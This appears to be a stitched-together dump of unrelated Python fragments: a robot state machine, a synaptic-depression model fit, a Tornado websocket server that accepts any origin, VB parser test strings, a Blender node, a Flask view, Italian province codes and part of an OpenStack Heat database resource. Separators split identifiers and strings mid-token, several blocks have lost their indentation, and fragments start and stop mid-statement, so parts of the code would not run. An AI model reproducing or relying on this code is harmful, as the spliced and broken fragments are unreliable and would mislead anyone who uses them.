        # trajectory, then open the gripper. (Generated by FlexBE; edit only
        # within the MANUAL tags.)
        # x:976 y:64, x:973 y:289
        _state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
        # Additional creation code can be added inside the following tags
        # [MANUAL_CREATE]
        # [/MANUAL_CREATE]
        with _state_machine:
            # x:42 y:72
            OperatableStateMachine.add('INIT HEAD',
                                       SaraSetHeadAngle(pitch=0.4, yaw=0),
                                       transitions={'done': 'repos'},
                                       autonomy={'done': Autonomy.Off})
            # x:205 y:72
            OperatableStateMachine.add('repos',
                                       RunTrajectory(file="repos", duration=0),
                                       transitions={'done': 'opengrip'},
                                       autonomy={'done': Autonomy.Off})
            # x:506 y:86
            OperatableStateMachine.add('opengrip',
                                       SetGripperState(width=0.1, effort=0),
                                       transitions={'object': 'finished', 'no_object': 'finished'},
                                       autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
                                       remapping={'object_size': 'object_size'})
        return _state_machine

    # Private functions can be added inside the following tags
    # [MANUAL_FUNC]
    # [/MANUAL_FUNC]
|
import numpy as np
import matplotlib.pyplot as plt
from math import exp

# Short-term synaptic depression fit (Tsodyks-Markram style model).
# A train of `size` pulses: the first (size - 1) arrive every `dt` ms and
# the last one after a longer `dt_2` ms gap.
size = 9
dt = 50.0     # ms, inter-pulse interval
dt_2 = 550.0  # ms, interval before the final pulse

# Vectors to fit
x_fit = np.zeros(size)      # fraction of available synaptic resources
V_max_fit = np.zeros(size)  # peak voltage per pulse
V0_fit = np.zeros(size)     # baseline voltage at pulse onset

# Parameters of the model
tau_rec = 1000.0  # ms, resource recovery time constant
tau_mem = 32.0    # ms, membrane time constant
tau_in = 1.8      # ms, synaptic input time constant
A = 144.0
u = 0.26

# First we fit x (resource depletion + recovery between pulses).
# BUG FIX: the recovery term "+ 1 - exp(-dt / tau_rec)" used to sit on its
# own line without a continuation, so it parsed as a separate no-op
# statement and was silently dropped; the expression is now parenthesized.
x_fit[0] = 1
for i in range(size - 2):
    x_fit[i + 1] = (x_fit[i] * (1 - u) * exp(-dt / tau_rec)
                    + 1 - exp(-dt / tau_rec))
# Last value of x_fit uses the longer interval dt_2 (same fix applied).
x_fit[-1] = (x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
             + 1 - exp(-dt_2 / tau_rec))

# We calculate alpha fit (effective synaptic amplitude per pulse)
alpha_fit = u * A * x_fit

# Now we calculate V_0 (baseline carried over from the previous pulse)
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
    ex1 = exp(-dt / tau_in)
    ex2 = exp(-dt / tau_mem)
    print('ex1 ex2', ex1, ex2)
    problem = ex1 - ex2
    print('problem', problem)
    this = alpha_fit[k] * tau_in / tau_diff
    print('this', this)
    that = V0_fit[k] * exp(-dt / tau_mem)
    print('that', that)
    V0_fit[k + 1] = that + this * problem

# Peak voltage per pulse.
for k in range(size - 1):
    aux2 = (alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
    # BUG FIX: previously read alpha_fit[i] -- a stale index left over
    # from the earlier loop; the loop variable here is k.
    aux = alpha_fit[k] * tau_mem / aux2
    V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))

# The final values (after the longer dt_2 interval)
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print('ex1 ex2', ex1, ex2)
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
                                 * tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit

# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
# NOTE: plt.hold(True) was removed in matplotlib >= 3.0; repeated plot()
# calls already draw on the same axes.
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
|
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1  # websocket port: one above the main HTTP port
handlers = []  # every currently-open WSHandler connection
channels = {}  # channel name -> set of WSHandlers subscribed to it
class WebSocket:
    """Facade for starting the websocket server and pushing messages to
    connected clients. All methods are static; state lives at module level."""

    @staticmethod
    def available():
        """True when tornado imported successfully."""
        return tornadoAvailable

    @staticmethod
    def start():
        """Launch the serving thread; no-op when tornado is unavailable."""
        if WebSocket.available():
            WSThread().start()

    @staticmethod
    def broadcast(data):
        """JSON-serialize *data* and send it to every connected client."""
        payload = toJS(data)
        for client in handlers:
            client.write_message(payload)

    @staticmethod
    def sendChannel(channel, data):
        """Send *data* to all clients subscribed to *channel*, tagging the
        payload with the channel name when it lacks one."""
        if 'channel' not in data:
            data['channel'] = channel
        payload = toJS(data)
        for client in channels.get(channel, []):
            client.write_message(payload)
class WSThread(Thread):
    """Daemon thread that runs the tornado IOLoop serving websocket clients."""
    def __init__(self):
        Thread.__init__(self)
        self.name = 'websocket'
        self.daemon = True  # don't block process exit
    def run(self):
        # NOTE(review): only tornado.ioloop/tornado.websocket are imported
        # at the top of this file; tornado.web appears reachable because
        # tornado.websocket imports it internally -- confirm on tornado
        # upgrades.
        app = tornado.web.Application([('/', WSHandler)])
        app.listen(PORT, '0.0.0.0')
        tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
    """Per-connection websocket handler.

    Tracks which channels this connection subscribed to and keeps the
    module-level `handlers`/`channels` registries in sync.
    """
    def __init__(self, *args, **kw):
        super(WSHandler, self).__init__(*args, **kw)
        self.channels = set()  # channels this connection is subscribed to

    def check_origin(self, origin):
        # Accept cross-origin websocket connections.
        return True

    def open(self):
        handlers.append(self)
        console('websocket', "Opened")

    def on_message(self, message):
        """Handle a JSON message with optional 'subscribe'/'unsubscribe'
        lists of channel names."""
        console('websocket', "Message received: %s" % message)
        try:
            data = fromJS(message)
        except (ValueError, TypeError):
            # Malformed JSON (or a non-string payload): ignore the message.
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt.
            return
        if 'subscribe' in data and isinstance(data['subscribe'], list):
            addChannels = (set(data['subscribe']) - self.channels)
            self.channels |= addChannels
            for channel in addChannels:
                if channel not in channels:
                    channels[channel] = set()
                channels[channel].add(self)
        if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
            rmChannels = (self.channels & set(data['unsubscribe']))
            self.channels -= rmChannels
            for channel in rmChannels:
                channels[channel].remove(self)
                if len(channels[channel]) == 0:
                    del channels[channel]

    def on_close(self):
        # Drop this connection from every channel it joined, pruning
        # channels that become empty.
        for channel in self.channels:
            channels[channel].remove(self)
            if len(channels[channel]) == 0:
                del channels[channel]
        handlers.remove(self)
        console('websocket', "Closed")
# Human-readable descriptions for task-field updates, keyed by field name.
verbs = {
    'status': "Status set",
    'name': "Renamed",
    'goal': "Goal set",
    'assigned': "Reassigned",
    'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
    """Pushes task create/update events to the sprint's backlog channel."""
    def newTask(self, handler, task):
        WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
    def taskUpdate(self, handler, task, field, value):
        # Normalize non-JSON-serializable values before broadcasting.
        if field == 'assigned': # Convert set of Users to list of usernames
            value = [user.username for user in value]
        elif field == 'goal': # Convert Goal to goal ID
            value = value.id if value else 0
        description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
        WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
|
0 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compound And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (40 of 61)
# ByVal, ByRef args
tests.append("""
Sub MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a, y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (41 of 61)
# 852166 Sub X<spc>(a,b,c) fails to parse
tests.append("""
Sub MySub (ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# 880612 Continuation character inside call
tests.append("""
Sub MySub _
(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (42 of 61)
# simple fn
tests.append("""
Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# simple fn with exit
tests.append("""
Function MyFn()
a=10
n=20
MyFn = 20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.extend(["""
Private Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function""",
"""
Public Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
"""
Friend Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
])
# simple fn with gap in ()
tests.append("""
Function MyFn( )
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# << Parsing tests >> (43 of 61)
# simple sub
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
Public Function fn(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (44 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function fc(x As Single, y, z As Object, a, b As My | Thing.Object, c) As Object.Obj
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y As Variant, z, a As Boolena, b, c As Long) As Variant
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As String
a=10
n=20
c="hello | "
End Function
""")
# function returning an array
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single()
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (45 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, Optional b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c) As Integer
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long) As Long
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As Control.Buttons.BigButtons.ThisOne
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (46 of 61)
# ByVal, ByRef args
tests.append("""
Function MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a, y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (47 of 61)
# Simple property let/get/set
tests.extend(["""
Property Let MyProp(NewVal As String)
a = NewVal
Exit Property
End Property
""",
"""
Property Get MyProp() As Long
MyProp = NewVal
Exit Property
End Property
""",
"""
Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
Exit Property
End Property
"""
"""
Public Property Let MyProp(NewVal As String)
a = NewVal
End Property
""",
"""
Public Property Ge |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
    ''' MatrixGenerator: build transform matrices from location, scale,
    rotation axis and angle inputs. '''
    bl_idname = 'MatrixGenNode'
    bl_label = 'Matrix in'
    bl_icon = 'OUTLINER_OB_EMPTY'
    def sv_init(self, context):
        # Declare input sockets with editable default properties.
        s = self.inputs.new('VerticesSocket', "Location")
        s.use_prop = True
        s = self.inputs.new('VerticesSocket', "Scale")
        s.use_prop = True
        s.prop = (1, 1 , 1)
        s = self.inputs.new('VerticesSocket', "Rotation")
        s.use_prop = True
        s.prop = (0, 0, 1)
        self.inputs.new('StringsSocket', "Angle")
        self.outputs.new('MatrixSocket', "Matrix")
    def process(self):
        L,S,R,A = self.inputs
        Ma = self.outputs[0]
        # Skip all work when nothing consumes the output.
        if not Ma.is_linked:
            return
        loc = Vector_generate(L.sv_get())
        scale = Vector_generate(S.sv_get())
        rot = Vector_generate(R.sv_get())
        rotA, angle = [[]], [[0.0]]
        # ability to add vector & vector difference instead of only rotation values
        if A.is_linked:
            # A vector-typed Angle input supplies rotation vectors (rotA);
            # otherwise it supplies scalar angles.
            if A.links[0].from_socket.bl_idname == 'VerticesSocket':
                rotA = Vector_generate(A.sv_get())
                angle = [[]]
            else:
                angle = A.sv_get()
                rotA = [[]]
        # One identity matrix per entry of the longest input list.
        max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
        orig = []
        for l in range(max_l):
            M = mathutils.Matrix()
            orig.append(M)
        matrixes_ = matrixdef(orig, loc, scale, rot, angle, rotA)
        matrixes = Matrix_listing(matrixes_)
        Ma.sv_set(matrixes)
def register():
    # Register the node class with Blender.
    bpy.utils.register_class(MatrixGenNode)
def unregister():
    # Remove the node class from Blender.
    bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
    register()
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view impo | rt View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
    """Render the match-detail page for *match_id*."""
    view = Match(match.get_match(match_id))
    return view.page()
# pylint | : disable=no-self-use,too-many-instance-attributes
class Match(View):
    """View model for the match-detail page: flattens a match.Match into
    the attributes the template reads."""
    def __init__(self, viewed_match: match.Match) -> None:
        super().__init__()
        if not viewed_match:
            raise DoesNotExistException()
        self.match = viewed_match
        self.id = viewed_match.id
        self.comment = viewed_match.comment
        self.format_name = viewed_match.format_name()
        # Plain and linkified "A vs B" strings for display.
        self.players_string = ' vs '.join([p.name for p in viewed_match.players])
        self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
        self.module_string = ', '.join([m.name for m in viewed_match.modules])
        if not viewed_match.games:
            self.no_games = True
            return
        self.game_one = viewed_match.games[0]
        self.has_game_two = False
        self.has_game_three = False
        if len(viewed_match.games) > 1:
            self.has_game_two = True
            self.game_two = viewed_match.games[1]
            if len(viewed_match.games) > 2:
                self.has_game_three = True
                self.game_three = viewed_match.games[2]
        # Backfill attributes that older imports did not populate, then
        # read them off the (re-imported) match.
        if viewed_match.has_unexpected_third_game is None:
            importing.reimport(viewed_match)
        self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
        if viewed_match.is_tournament is None:
            importing.reimport(viewed_match)
        self.is_tournament = viewed_match.is_tournament
    def og_title(self) -> str:
        # OpenGraph title: the participating players.
        return self.players_string
    def og_url(self) -> str:
        return url_for('show_match', match_id=self.id, _external=True)
    def og_description(self) -> str:
        # e.g. "A Modern match."
        p = inflect.engine()
        fmt = titlecase.titlecase(p.a(self.format_name))
        description = '{fmt} match.'.format(fmt=fmt)
        return description
def player_link(name: str) -> str:
    """Return an HTML anchor linking to *name*'s person page."""
    href = html.escape(url_for('show_person', person=name))
    label = html.escape(name)
    return '<a href="{url}">{name}</a>'.format(url=href, name=label)
|
# -*- coding: utf-8 -*-
# Italian province (code, name) choices.
# FIX: a missing comma after ('RN', 'Rimini') made the next tuple a call
# expression -- ('RN', 'Rimini')('RM', 'Roma') -- raising TypeError at
# import time. Also corrected the spelling of L'Aquila.
PROVINCE_CHOICES = (
    ('AG', 'Agrigento'),
    ('AL', 'Alessandria'),
    ('AN', 'Ancona'),
    ('AO', 'Aosta'),
    ('AR', 'Arezzo'),
    ('AP', 'Ascoli Piceno'),
    ('AT', 'Asti'),
    ('AV', 'Avellino'),
    ('BA', 'Bari'),
    # ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
    ('BL', 'Belluno'),
    ('BN', 'Benevento'),
    ('BG', 'Bergamo'),
    ('BI', 'Biella'),
    ('BO', 'Bologna'),
    ('BZ', 'Bolzano/Bozen'),
    ('BS', 'Brescia'),
    ('BR', 'Brindisi'),
    ('CA', 'Cagliari'),
    ('CL', 'Caltanissetta'),
    ('CB', 'Campobasso'),
    ('CI', 'Carbonia-Iglesias'),
    ('CE', 'Caserta'),
    ('CT', 'Catania'),
    ('CZ', 'Catanzaro'),
    ('CH', 'Chieti'),
    ('CO', 'Como'),
    ('CS', 'Cosenza'),
    ('CR', 'Cremona'),
    ('KR', 'Crotone'),
    ('CN', 'Cuneo'),
    ('EN', 'Enna'),
    # ('FM', 'Fermo'), # active starting from 2009
    ('FE', 'Ferrara'),
    ('FI', 'Firenze'),
    ('FG', 'Foggia'),
    ('FC', 'Forlì-Cesena'),
    ('FR', 'Frosinone'),
    ('GE', 'Genova'),
    ('GO', 'Gorizia'),
    ('GR', 'Grosseto'),
    ('IM', 'Imperia'),
    ('IS', 'Isernia'),
    ('SP', 'La Spezia'),
    ('AQ', u'L’Aquila'),  # was misspelled 'L’Acquila'
    ('LT', 'Latina'),
    ('LE', 'Lecce'),
    ('LC', 'Lecco'),
    ('LI', 'Livorno'),
    ('LO', 'Lodi'),
    ('LU', 'Lucca'),
    ('MC', 'Macerata'),
    ('MN', 'Mantova'),
    ('MS', 'Massa-Carrara'),
    ('MT', 'Matera'),
    ('VS', 'Medio Campidano'),
    ('ME', 'Messina'),
    ('MI', 'Milano'),
    ('MO', 'Modena'),
    # ('MB', 'Monza e Brianza'), # active starting from 2009
    ('NA', 'Napoli'),
    ('NO', 'Novara'),
    ('NU', 'Nuoro'),
    ('OG', 'Ogliastra'),
    ('OT', 'Olbia-Tempio'),
    ('OR', 'Oristano'),
    ('PD', 'Padova'),
    ('PA', 'Palermo'),
    ('PR', 'Parma'),
    ('PV', 'Pavia'),
    ('PG', 'Perugia'),
    ('PU', 'Pesaro e Urbino'),
    ('PE', 'Pescara'),
    ('PC', 'Piacenza'),
    ('PI', 'Pisa'),
    ('PT', 'Pistoia'),
    ('PN', 'Pordenone'),
    ('PZ', 'Potenza'),
    ('PO', 'Prato'),
    ('RG', 'Ragusa'),
    ('RA', 'Ravenna'),
    ('RC', 'Reggio Calabria'),
    ('RE', 'Reggio Emilia'),
    ('RI', 'Rieti'),
    ('RN', 'Rimini'),
    ('RM', 'Roma'),
    ('RO', 'Rovigo'),
    ('SA', 'Salerno'),
    ('SS', 'Sassari'),
    ('SV', 'Savona'),
    ('SI', 'Siena'),
    ('SR', 'Siracusa'),
    ('SO', 'Sondrio'),
    ('TA', 'Taranto'),
    ('TE', 'Teramo'),
    ('TR', 'Terni'),
    ('TO', 'Torino'),
    ('TP', 'Trapani'),
    ('TN', 'Trento'),
    ('TV', 'Treviso'),
    ('TS', 'Trieste'),
    ('UD', 'Udine'),
    ('VA', 'Varese'),
    ('VE', 'Venezia'),
    ('VB', 'Verbano Cusio Ossola'),
    ('VC', 'Vercelli'),
    ('VR', 'Verona'),
    ('VV', 'Vibo Valentia'),
    ('VI', 'Vicenza'),
    ('VT', 'Viterbo'),
)
|
)
]
    def __init__(self, name, json_snippet, stack):
        super(Instance, self).__init__(name, json_snippet, stack)
        # Lazily-populated caches; see the `dbinstance` property.
        self._href = None
        self._dbinstance = None
@property
def dbinstance(self):
"""Get the trove dbinstance."""
if not self._dbinstance and self.resource_id:
self._dbinstance = self.client().instances.get(self.resource_id)
return self._dbinstance
def _dbinstance_name(self):
name = self.properties[self.NAME]
if name:
return name
return self.physical_resource_name()
    def handle_create(self):
        """Create cloud database instance.

        Reads the resource properties, reshapes users and networks into the
        structures troveclient expects, issues the create call and returns
        the new instance id (also stored as the resource id).
        """
        self.flavor = self.properties[self.FLAVOR]
        self.volume = {'size': self.properties[self.SIZE]}
        self.databases = self.properties[self.DATABASES]
        self.users = self.properties[self.USERS]
        restore_point = self.properties[self.RESTORE_POINT]
        if restore_point:
            # troveclient expects a backup reference wrapper, not a bare id.
            restore_point = {"backupRef": restore_point}
        zone = self.properties[self.AVAILABILITY_ZONE]
        self.datastore_type = self.properties[self.DATASTORE_TYPE]
        self.datastore_version = self.properties[self.DATASTORE_VERSION]
        replica_of = self.properties[self.REPLICA_OF]
        replica_count = self.properties[self.REPLICA_COUNT]
        # convert user databases to format required for troveclient.
        # that is, list of database dictionaries
        for user in self.users:
            dbs = [{'name': db} for db in user.get(self.USER_DATABASES, [])]
            user[self.USER_DATABASES] = dbs
        # convert networks to format required by troveclient
        nics = []
        for nic in self.properties[self.NICS]:
            nic_dict = {}
            net = nic.get(self.NET)
            port = nic.get(self.PORT)
            if net or port:
                # Resolve names to ids via neutron before passing through.
                neutron = self.client_plugin('neutron')
                if net:
                    net_id = neutron.find_resourceid_by_name_or_id(
                        neutron.RES_TYPE_NETWORK,
                        net)
                    nic_dict['net-id'] = net_id
                if port:
                    port_id = neutron.find_resourceid_by_name_or_id(
                        neutron.RES_TYPE_PORT,
                        port)
                    nic_dict['port-id'] = port_id
            ip = nic.get(self.V4_FIXED_IP)
            if ip:
                nic_dict['v4-fixed-ip'] = ip
            nics.append(nic_dict)
        # create DB instance
        instance = self.client().instances.create(
            self._dbinstance_name(),
            self.flavor,
            volume=self.volume,
            databases=self.databases,
            users=self.users,
            restorePoint=restore_point,
            availability_zone=zone,
            datastore=self.datastore_type,
            datastore_version=self.datastore_version,
            nics=nics,
            replica_of=replica_of,
            replica_count=replica_count)
        self.resource_id_set(instance.id)
        return instance.id
    def _refresh_instance(self, instance_id):
        """Fetch the Trove instance, returning None on an over-limit error.

        Over-limit (rate-limited) responses are logged and swallowed so the
        caller can simply retry on the next poll; any other error is raised.
        """
        try:
            instance = self.client().instances.get(instance_id)
            return instance
        except Exception as exc:
            if self.client_plugin().is_over_limit(exc):
                LOG.warning("Stack %(name)s (%(id)s) received an "
                            "OverLimit response during instance.get():"
                            " %(exception)s",
                            {'name': self.stack.name,
                             'id': self.stack.id,
                             'exception': exc})
                return None
            else:
                raise
    def check_create_complete(self, instance_id):
        """Check if cloud DB instance creation is complete.

        Returns True once the instance reaches ACTIVE; raises
        ResourceInError for any status in BAD_STATUSES.
        """
        instance = self._refresh_instance(instance_id)  # refresh attributes
        if instance is None:
            # Over-limit response from Trove; keep polling.
            return False
        if instance.status in self.BAD_STATUSES:
            raise exception.ResourceInError(
                resource_status=instance.status,
                status_reason=self.TROVE_STATUS_REASON.get(instance.status,
                                                           _("Unknown")))
        if instance.status != self.ACTIVE:
            return False
        LOG.info("Database instance %(database)s created "
                 "(flavor:%(flavor)s, volume:%(volume)s, "
                 "datastore:%(datastore_type)s, "
                 "datastore_version:%(datastore_version)s)",
                 {'database': self._dbinstance_name(),
                  'flavor': self.flavor,
                  'volume': self.volume,
                  'datastore_type': self.datastore_type,
                  'datastore_version': self.datastore_version})
        return True
def handle_check(self):
instance = self.client().instances.get(self.resource_id)
status = instance.status
checks = [
{'attr': 'status', 'expected': self.ACTIVE, 'current': status},
]
self._verify_check_conditions(checks)
    def handle_update(self, json_snippet, tmpl_diff, prop_diff):
        """Collect changed properties into a map of pending updates.

        Databases and users are diffed against the live instance and each
        entry is tagged with a CREATE or DELETE 'ACTION'. The returned dict
        is consumed by check_update_complete(), which performs the actual
        API calls.
        """
        updates = {}
        if prop_diff:
            instance = self.client().instances.get(self.resource_id)
            if self.NAME in prop_diff:
                updates.update({self.NAME: prop_diff[self.NAME]})
            if self.FLAVOR in prop_diff:
                flv = prop_diff[self.FLAVOR]
                updates.update({self.FLAVOR: flv})
            if self.SIZE in prop_diff:
                updates.update({self.SIZE: prop_diff[self.SIZE]})
            if self.DATABASES in prop_diff:
                # Tag desired databases missing on the instance with CREATE,
                # and append DELETE entries for databases no longer desired.
                current = [d.name
                           for d in self.client().databases.list(instance)]
                desired = [d[self.DATABASE_NAME]
                           for d in prop_diff[self.DATABASES]]
                for db in prop_diff[self.DATABASES]:
                    dbname = db[self.DATABASE_NAME]
                    if dbname not in current:
                        db['ACTION'] = self.CREATE
                for dbname in current:
                    if dbname not in desired:
                        deleted = {self.DATABASE_NAME: dbname,
